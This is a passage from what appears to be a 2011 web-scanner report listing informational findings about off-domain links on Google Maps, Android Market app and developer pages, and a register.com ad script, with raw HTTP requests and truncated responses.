Set-Cookie: PREF=ID=19674e168110c698:U=17ea5243225a615b:TM=1308589662:LM=1310521935:S=34g7y1Dpote6i-Qu; expires=Fri, 12-Jul-2013 01:52:15 GMT; path=/; domain=.google.com
X-Content-Type-Options: nosniff
Server: mfe
X-XSS-Protection: 1; mode=block
Connection: close

<!DOCTYPE html><html class="no-maps-mini" xmlns:v="urn:schemas-microsoft-com:vml"> <head> <meta content="text/html;charset=UTF-8" http-equiv="content-type"/> <meta content="Find local businesses, vie
...[SNIP]...
<li class=gbmtc><a class=gbmt id=gb_36 onclick="gbar.qs(this);gbar.logger.il(1,{t:36})" href="http://www.youtube.com/results?file%5Cu003dgoogleapi=&sa=N&hl=en&tab=l1">YouTube</a>
...[SNIP]...
<td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="280" height="1" alt=""/> </td> <td> <img src="http://maps.gstatic.com/mapfiles/transparent.png" width="220" height="1" alt=""/> </td>
...[SNIP]...
</a> <img class="panel-bar-divider bar-divider" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </span>
...[SNIP]...
<a style="display:none" href="#" jsdisplay="topbar_config.show_lbc_badge" jsattrs="href: topbar_config.lbc_badge_url"> <img src="http://maps.gstatic.com/mapfiles/placepage/checkmark_13x14.gif" alt=""/> <span class="link-text">
...[SNIP]...
<a style="display:" jsattrs="style.display: topbar_config.show_panel_toggler?'':'none'" id="paneltoggle2" href="javascript:void(0)" log="paneltgl"> <img class="collapse-left3" title="Hide panel" id="panelarrow2" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
jsattrs="style.display: topbar_config.show_return_arrow?'':'none'; href: topbar_config.show_return_arrow?topbar_config.return_arrow_url:'#'" id="return-to-mapview" onclick="return loadUrl(this.href)"> <img class="collapse-left3" title="Map View" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<a href="javascript:void(0)" id="view_kml_link"><img class="bar-icon view-as-kml" src="http://maps.gstatic.com/mapfiles/transparent.png"/><span class="link-text">
...[SNIP]...
</a> <img class="bar-icon-divider bar-divider" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </span> <a style="text-decoration:none" href="javascript:void(0);" jsaction="print.show" id="print"><img class="bar-icon bar-icon-print2" src="http://maps.gstatic.com/mapfiles/transparent.png"/> <span class="link-text">
...[SNIP]...
</a> <img class="bar-icon-divider bar-divider" src="http://maps.gstatic.com/mapfiles/transparent.png"/> <a style="text-decoration:none" id="showsendtox" href="javascript:void(0)" jsaction="stx.show"><img class="bar-icon bar-icon-email2" src="http://maps.gstatic.com/mapfiles/transparent.png"/> <span class="link-text">
...[SNIP]...
</a> <img class="bar-icon-divider bar-divider" src="http://maps.gstatic.com/mapfiles/transparent.png"/> <a style="text-decoration:none" href="javascript:void(0);" jsaction="link.show" id="link"><img class="bar-icon bar-icon-link2" src="http://maps.gstatic.com/mapfiles/transparent.png"/> <span class="link-text">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> <div class="flmcpanup clickable" style="width:20px" id="pan_up_inline" jsaction="flmc.selectPanUp">
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" id="zoom_out_inline_img" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" style="width:103px" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</div> <img class="hide-msie-6" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png"/> </div>
...[SNIP]...
</span> <img class="mv-dropdown" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...
<div id="overview-toggle"><img id="overview-toggle-image" src="http://maps.gstatic.com/mapfiles/mapcontrols3d5.png" jsaction="overview.toggle"/> </div>
...[SNIP]...
<a id="d_close" href="javascript:void(0)" jsaction="llm.close" jstrack="1"> <img class="launch_close" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </a>
...[SNIP]...
<div class="dir-tm" style="visibility:" id="travel_modes_div"> <img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/><a jsfor="travelModes" jsattrs=".tm:$this" href="javascript:void(0)" tabindex="3" jsaction="tm.click"><img jsattrs="id:'dir_' + $this + '_btn';title:$modeMsgs[$this];className:'dir-tm-' + $this + '-unselected' +' dir-tm-btn' + ($index != 0 ? ' dir-tm-btn-side-border':'')" src="http://maps.gstatic.com/mapfiles/transparent.png" width="37" height="23"/></a><img class="dir-tm-sides" src="http://maps.gstatic.com/mapfiles/transparent.png"/> </div>
...[SNIP]...

12.5. https://market.android.com/details previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://market.android.com
Path:	/details

Issue detail

The page was loaded from a URL containing a query string:

https://market.android.com/details?id=com.genwi.delaware

The response contains the following links to other domains:

https://apis.google.com/js/plusone.js
https://checkout.google.com/customer/gadget/embeddedbuy.js?divId=checkout-root&copyrightFooterDivId=checkout-footer&hl=en_US&gl=US
https://docs.google.com/
https://mail.google.com/mail/
https://picasaweb.google.com/home
https://sites.google.com/
https://ssl.gstatic.com/android/market/com.foxnews.android/hi-512-14
https://ssl.gstatic.com/android/market/com.genwi.delaware/hi-512-11
https://ssl.gstatic.com/android/market/com.genwi.delaware/ss-320-0-11
https://ssl.gstatic.com/android/market/com.genwi.delaware/ss-320-1-11
https://ssl.gstatic.com/android/market/com.mylocaltv.wtxf/hi-256-0-f4cf4ef7402b6a738ec737dfa630624b493b07ee
https://ssl.gstatic.com/android/market/com.mylottos.results/hi-256-2-799e13fd1c5bf6ed872a7a88a6ce952a53234d2c
https://ssl.gstatic.com/android/market/org.npr.android.news/hi-512-8
https://ssl.gstatic.com/android/market_images/badges/topdev_ann.png
https://www.google.com/accounts/ServiceLogin?service=androidmarket&passive=86400&continue=https://market.android.com/details?id%3Dcom.genwi.delaware&followup=https://market.android.com/details?id%3Dcom.genwi.delaware
https://www.google.com/calendar
https://www.google.com/reader/

Request

GET /details?id=com.genwi.delaware HTTP/1.1
Host: market.android.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=2592000
Content-Type: text/html; charset=UTF-8
Date: Wed, 13 Jul 2011 02:00:10 GMT
Expires: Wed, 13 Jul 2011 02:00:10 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 44823

<!DOCTYPE html><html><head><script type="text/javascript">function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t
...[SNIP]...
</script><script src="https://checkout.google.com/customer/gadget/embeddedbuy.js?divId=checkout-root&copyrightFooterDivId=checkout-footer&hl=en_US&gl=US"></script>
...[SNIP]...
</script><script src="https://apis.google.com/js/plusone.js">{"lang": "en_US"}</script>
...[SNIP]...
</a> <a target=_blank href="https://mail.google.com/mail/" class=gb1>Gmail</a>
...[SNIP]...
</a> <a target=_blank href="https://www.google.com/calendar" class=gb2>Calendar</a> <a target=_blank href="https://picasaweb.google.com/home" class=gb2>Photos</a> <a target=_blank href="https://docs.google.com/" class=gb2>Documents</a> <a target=_blank href="https://www.google.com/reader/" class=gb2>Reader</a> <a target=_blank href="https://sites.google.com/" class=gb2>Sites</a>
...[SNIP]...
</span><a id="gb_70" href="https://www.google.com/accounts/ServiceLogin?service=androidmarket&passive=86400&continue=https://market.android.com/details?id%3Dcom.genwi.delaware&followup=https://market.android.com/details?id%3Dcom.genwi.delaware" class=gb4>Sign in</a>
...[SNIP]...
<div class="doc-banner-icon"><img class="photo" src="https://ssl.gstatic.com/android/market/com.genwi.delaware/hi-512-11" /></div>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.mylocaltv.wtxf&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wtxf/hi-256-0-f4cf4ef7402b6a738ec737dfa630624b493b07ee"alt="MyFoxPhilly Fox29 News"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.mylottos.results&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.mylottos.results/hi-256-2-799e13fd1c5bf6ed872a7a88a6ce952a53234d2c"alt="Lotto Results"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=org.npr.android.news&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/org.npr.android.news/hi-512-8"alt="NPR News"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.foxnews.android&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.foxnews.android/hi-512-14"alt="FOX News"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<div class="badges-badge-icon-annotation-developer goog-inline-block"><img src="https://ssl.gstatic.com/android/market_images/badges/topdev_ann.png" title="Top Developer" /></div>
...[SNIP]...
<div class="carousel-page"><img src="https://ssl.gstatic.com/android/market/com.genwi.delaware/ss-320-0-11" class="doc-screenshot-img lightbox" title="Delaware" itemprop="screenshots" /><img src="https://ssl.gstatic.com/android/market/com.genwi.delaware/ss-320-1-11" class="doc-screenshot-img lightbox" title="Delaware" itemprop="screenshots" /></div>
...[SNIP]...

12.6. https://market.android.com/details previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://market.android.com
Path:	/details

Issue detail

The page was loaded from a URL containing a query string:

https://market.android.com/details?id=com.avai.amp.pbn_delaware

The response contains the following links to other domains:

https://apis.google.com/js/plusone.js
https://checkout.google.com/customer/gadget/embeddedbuy.js?divId=checkout-root&copyrightFooterDivId=checkout-footer&hl=en_US&gl=US
https://docs.google.com/
https://mail.google.com/mail/
https://picasaweb.google.com/home
https://sites.google.com/
https://ssl.gstatic.com/android/market/com.avai.amp.lib.pbn_penn/hi-512-9
https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/hi-512-2
https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-0-2
https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-1-2
https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-2-2
https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-3-2
https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-4-2
https://ssl.gstatic.com/android/market/com.avai.amp.pbn_kentucky/hi-256-0-2fd0850ee708a2ec8ffe9bb989a243fe96491f3a
https://ssl.gstatic.com/android/market/com.avai.amp.pbn_northcarolina/hi-512-3
https://ssl.gstatic.com/android/market/com.avai.amp.pbn_rhodeisland/hi-256-1-5a7a027a6df4edf63297cbe745b63b5f0b2082d9
https://ssl.gstatic.com/android/market/com.crittermap.backcountrynavigator.license/hi-256-16-333eb755a682178f0627bcb070fe2a9c8c8942db
https://ssl.gstatic.com/android/market/com.jimbl.campingtripplanner/hi-256-1-c1707515eea19ad0d66941225fa9c567fc8bbc57
https://ssl.gstatic.com/android/market/com.mictale.gpsessentials/hi-512-3
https://ssl.gstatic.com/android/market/com.trimble.outdoors.backpacker.android/hi-512-6
https://www.google.com/accounts/ServiceLogin?service=androidmarket&passive=86400&continue=https://market.android.com/details?id%3Dcom.avai.amp.pbn_delaware&followup=https://market.android.com/details?id%3Dcom.avai.amp.pbn_delaware
https://www.google.com/calendar
https://www.google.com/reader/

Request

GET /details?id=com.avai.amp.pbn_delaware HTTP/1.1
Host: market.android.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=2592000
Content-Type: text/html; charset=UTF-8
Date: Wed, 13 Jul 2011 01:59:59 GMT
Expires: Wed, 13 Jul 2011 01:59:59 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 63772

<!DOCTYPE html><html><head><script type="text/javascript">function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t
...[SNIP]...
</script><script src="https://checkout.google.com/customer/gadget/embeddedbuy.js?divId=checkout-root&copyrightFooterDivId=checkout-footer&hl=en_US&gl=US"></script>
...[SNIP]...
</script><script src="https://apis.google.com/js/plusone.js">{"lang": "en_US"}</script>
...[SNIP]...
</a> <a target=_blank href="https://mail.google.com/mail/" class=gb1>Gmail</a>
...[SNIP]...
</a> <a target=_blank href="https://www.google.com/calendar" class=gb2>Calendar</a> <a target=_blank href="https://picasaweb.google.com/home" class=gb2>Photos</a> <a target=_blank href="https://docs.google.com/" class=gb2>Documents</a> <a target=_blank href="https://www.google.com/reader/" class=gb2>Reader</a> <a target=_blank href="https://sites.google.com/" class=gb2>Sites</a>
...[SNIP]...
</span><a id="gb_70" href="https://www.google.com/accounts/ServiceLogin?service=androidmarket&passive=86400&continue=https://market.android.com/details?id%3Dcom.avai.amp.pbn_delaware&followup=https://market.android.com/details?id%3Dcom.avai.amp.pbn_delaware" class=gb4>Sign in</a>
...[SNIP]...
<div class="doc-banner-icon"><img class="photo" src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/hi-512-2" /></div>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.avai.amp.pbn_northcarolina&feature=more_from_developer"><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_northcarolina/hi-512-3"alt="Approved NC State Parks Guide"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.avai.amp.lib.pbn_penn&feature=more_from_developer"><img src="https://ssl.gstatic.com/android/market/com.avai.amp.lib.pbn_penn/hi-512-9"alt="Official PA State Parks Guide"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.avai.amp.pbn_rhodeisland&feature=more_from_developer"><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_rhodeisland/hi-256-1-5a7a027a6df4edf63297cbe745b63b5f0b2082d9"alt="Official RI State Parks Guide"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.avai.amp.pbn_kentucky&feature=more_from_developer"><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_kentucky/hi-256-0-2fd0850ee708a2ec8ffe9bb989a243fe96491f3a"alt="Official KY State Parks Guide"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.trimble.outdoors.backpacker.android&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.trimble.outdoors.backpacker.android/hi-512-6"alt="Backpacker GPS Trails Pro"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.jimbl.campingtripplanner&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.jimbl.campingtripplanner/hi-256-1-c1707515eea19ad0d66941225fa9c567fc8bbc57"alt="Camping Trip Planner"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.mictale.gpsessentials&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.mictale.gpsessentials/hi-512-3"alt="GPS Essentials"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<a class="app-snippet-thumbnail" data-a="2" data-c="1" href="/details?id=com.crittermap.backcountrynavigator.license&feature=related_apps"><img src="https://ssl.gstatic.com/android/market/com.crittermap.backcountrynavigator.license/hi-256-16-333eb755a682178f0627bcb070fe2a9c8c8942db"alt="BackCountry Navigator PRO"class="app-snippet-thumbnail" /></a>
...[SNIP]...
<div class="carousel-page"><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-0-2" class="doc-screenshot-img lightbox" title="Official DE State Parks Guide" itemprop="screenshots" /><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-1-2" class="doc-screenshot-img lightbox" title="Official DE State Parks Guide" itemprop="screenshots" /><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-2-2" class="doc-screenshot-img lightbox" title="Official DE State Parks Guide" itemprop="screenshots" /></div><div class="carousel-page"><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-3-2" class="doc-screenshot-img lightbox" title="Official DE State Parks Guide" itemprop="screenshots" /><img src="https://ssl.gstatic.com/android/market/com.avai.amp.pbn_delaware/ss-320-4-2" class="doc-screenshot-img lightbox" title="Official DE State Parks Guide" itemprop="screenshots" /></div>
...[SNIP]...

12.7. https://market.android.com/developer previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://market.android.com
Path:	/developer

Issue detail

The page was loaded from a URL containing a query string:

https://market.android.com/developer?pub=My+Local+TV

The response contains the following links to other domains:

https://apis.google.com/js/plusone.js
https://checkout.google.com/customer/gadget/embeddedbuy.js?divId=checkout-root&copyrightFooterDivId=checkout-footer&hl=en_US&gl=US
https://docs.google.com/
https://mail.google.com/mail/
https://picasaweb.google.com/home
https://sites.google.com/
https://ssl.gstatic.com/android/market/com.mylocaltv.kare/hi-512-7
https://ssl.gstatic.com/android/market/com.mylocaltv.kdfw/hi-256-1-a465966661f1fcbfe547ba368b062b1821959489
https://ssl.gstatic.com/android/market/com.mylocaltv.kmsp/hi-512-10
https://ssl.gstatic.com/android/market/com.mylocaltv.kriv/hi-512-16
https://ssl.gstatic.com/android/market/com.mylocaltv.waga/hi-512-6
https://ssl.gstatic.com/android/market/com.mylocaltv.wavy/hi-256-0-cd96652761ca2d7aea8c1964fc532fb8574259ce
https://ssl.gstatic.com/android/market/com.mylocaltv.wcpo/hi-512-4
https://ssl.gstatic.com/android/market/com.mylocaltv.wfxt/hi-512-7
https://ssl.gstatic.com/android/market/com.mylocaltv.wjbk/hi-512-8
https://ssl.gstatic.com/android/market/com.mylocaltv.wood/hi-256-0-7988f7aad1c726b7a2e60197b46b14d7f895e804
https://ssl.gstatic.com/android/market/com.mylocaltv.wral/hi-256-0-9c9c992e5630164e28f9d372a3a1e289e9760830
https://ssl.gstatic.com/android/market/com.mylocaltv.wtnh/hi-512-5
https://www.google.com/accounts/ServiceLogin?service=androidmarket&passive=86400&continue=https://market.android.com/developer?pub%3DMy%2BLocal%2BTV&followup=https://market.android.com/developer?pub%3DMy%2BLocal%2BTV
https://www.google.com/calendar
https://www.google.com/reader/

Request

GET /developer?pub=My+Local+TV HTTP/1.1
Host: market.android.com
Connection: keep-alive
Referer: https://market.android.com/details?id=com.genwi.delaware
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PREF=ID=9cae866da36d6f34:TM=1310522402:LM=1310522402:S=Vufsd0X4Ov5c6tLC; NID=48=VB2kjZD9U7lL0X5uVLO8CGkeV3LlNTexxDeK5xpGpR0miadYsojCwg0qEcRa01gcj7UmK83UBT_BdbsjeNk4fxQErDPrh6J4wrWEszjQL6iYbEaav3xrsou2T0DMJdba

Response

HTTP/1.1 200 OK
Strict-Transport-Security: max-age=2592000
Content-Type: text/html; charset=UTF-8
Date: Wed, 13 Jul 2011 02:00:24 GMT
Expires: Wed, 13 Jul 2011 02:00:24 GMT
Cache-Control: private, max-age=0
X-Content-Type-Options: nosniff
X-Frame-Options: SAMEORIGIN
X-XSS-Protection: 1; mode=block
Server: GSE
Content-Length: 49394

<!DOCTYPE html><html><head><script type="text/javascript">function a(c){this.t={};this.tick=function(c,e,b){b=b!=void 0?b:(new Date).getTime();this.t
...[SNIP]...
</script><script src="https://checkout.google.com/customer/gadget/embeddedbuy.js?divId=checkout-root&copyrightFooterDivId=checkout-footer&hl=en_US&gl=US"></script>
...[SNIP]...
</script><script src="https://apis.google.com/js/plusone.js">{"lang": "en_US"}</script>
...[SNIP]...
</a> <a target=_blank href="https://mail.google.com/mail/" class=gb1>Gmail</a>
...[SNIP]...
</a> <a target=_blank href="https://www.google.com/calendar" class=gb2>Calendar</a> <a target=_blank href="https://picasaweb.google.com/home" class=gb2>Photos</a> <a target=_blank href="https://docs.google.com/" class=gb2>Documents</a> <a target=_blank href="https://www.google.com/reader/" class=gb2>Reader</a> <a target=_blank href="https://sites.google.com/" class=gb2>Sites</a>
...[SNIP]...
</span><a id="gb_70" href="https://www.google.com/accounts/ServiceLogin?service=androidmarket&passive=86400&continue=https://market.android.com/developer?pub%3DMy%2BLocal%2BTV&followup=https://market.android.com/developer?pub%3DMy%2BLocal%2BTV" class=gb4>Sign in</a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wral" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wral/hi-256-0-9c9c992e5630164e28f9d372a3a1e289e9760830"alt="WRAL" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.kmsp" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.kmsp/hi-512-10"alt="KMSP FOX 9 News Minneapolis" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wood" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wood/hi-256-0-7988f7aad1c726b7a2e60197b46b14d7f895e804"alt="WOODTV" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wtnh" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wtnh/hi-512-5"alt="wtnh.com" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.kare" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.kare/hi-512-7"alt="KARE 11 News Mpls.-St. Paul" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.kdfw" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.kdfw/hi-256-1-a465966661f1fcbfe547ba368b062b1821959489"alt="FOX 4 Dallas-Fort Worth" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wfxt" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wfxt/hi-512-7"alt="MyFoxBoston FOX 25 News" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.kriv" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.kriv/hi-512-16"alt="MyFoxHouston FOX 26 News" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wjbk" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wjbk/hi-512-8"alt="FOX 2 News" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.waga" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.waga/hi-512-6"alt="myfoxatlanta" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wavy" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wavy/hi-256-0-cd96652761ca2d7aea8c1964fc532fb8574259ce"alt="WAVY.com" /></a>
...[SNIP]...
<a href="/details?id=com.mylocaltv.wcpo" class="thumbnail" data-a="2" data-c="1"><img src="https://ssl.gstatic.com/android/market/com.mylocaltv.wcpo/hi-512-4"alt="WCPO.com" /></a>
...[SNIP]...

12.8. http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://oascentral.register.com
Path:	/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2

Issue detail

The page was loaded from a URL containing a query string:

http://oascentral.register.com/RealMedia/ads/adstream_mjx.ads/register.com/skenzo/expired/1710072706@Position2,Position3,x01,x02,x03,x04,x05,Bottom,Bottom1,Bottom2?

The response contains the following links to other domains:

http://ads.doclix.com/adserver/serve/js/doclix_synd_ifrm.js
http://ads.doclix.com/adserver/serve/js/doclix_synd_pop_under.js
http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif
https://view.atdmt.com/00F/iview/201823116/direct;wi.300;hi.250/01?click=http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/skenzo/expired/L27/1240745374/Position3/Register/Vistaprint300x250ROS_RON_Q32011/Vistaprint300x250ROS_RON_Q22011.html/7263485738303464672f4d41416c4c6d?
https://view.atdmt.com/00F/view/201823116/direct;wi.300;hi.250/01/

Request

Response

HTTP/1.1 200 OK
Date: Wed, 13 Jul 2011 11:39:31 GMT
Server: Apache/2.2.3 (Red Hat)
Set-Cookie: OAX=rcHW804dg/MAAlLm; expires=Sat, 13-Jul-13 11:39:31 GMT; path=/; domain=.register.com
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 11791
Content-Type: application/x-javascript
Set-Cookie: NSC_d12efm_qppm_iuuq=ffffffff09499e5f45525d5f4f58455e445a4a423660;path=/;httponly

function OAS_RICH(position) {
if (position == 'Bottom') {
document.write ('<script language=javascript type=text/javascript> \n');
document.write (' \n');
docume
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_pop_under.js" async="async" defer="defer" charset="utf-8"></script>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/skenzo/expired/1547657032/Bottom2/default/empty.gif/7263485738303464672f4d41416c4c6d?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
</script>\n');
document.write ('<script type="text/javascript" src="http://ads.doclix.com/adserver/serve/js/doclix_synd_ifrm.js" charset="utf-8"></script>');
}
if (position == 'Position3') {
document.write ('<iframe src="https://view.atdmt.com/00F/iview/201823116/direct;wi.300;hi.250/01?click=http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/skenzo/expired/L27/1240745374/Position3/Register/Vistaprint300x250ROS_RON_Q32011/Vistaprint300x250ROS_RON_Q22011.html/7263485738303464672f4d41416c4c6d?" frameborder="0" scrolling="no" marginheight="0" marginwidth="0" topmargin="0" leftmargin="0" allowtransparency="true" width="300" height="250">\n');
document.write ('<script language="JavaScript" type="text/javascript">
...[SNIP]...
Position3/Register/Vistaprint300x250ROS_RON_Q32011/Vistaprint300x250ROS_RON_Q22011.html/7263485738303464672f4d41416c4c6d?http://clk.atdmt.com/00F/go/201823116/direct;wi.300;hi.250/01/" target="_blank"><img border="0" src="https://view.atdmt.com/00F/view/201823116/direct;wi.300;hi.250/01/" /></a>
...[SNIP]...
<A HREF="http://oascentral.register.com/RealMedia/ads/click_lx.ads/register.com/skenzo/expired/1874750037/x02/default/empty.gif/7263485738303464672f4d41416c4c6d?x" target="_top"><IMG SRC="http://imagec12.247realmedia.com/RealMedia/ads/Creatives/default/empty.gif" WIDTH=1 HEIGHT=1 ALT="" BORDER=0 BORDER="0"></A>
...[SNIP]...
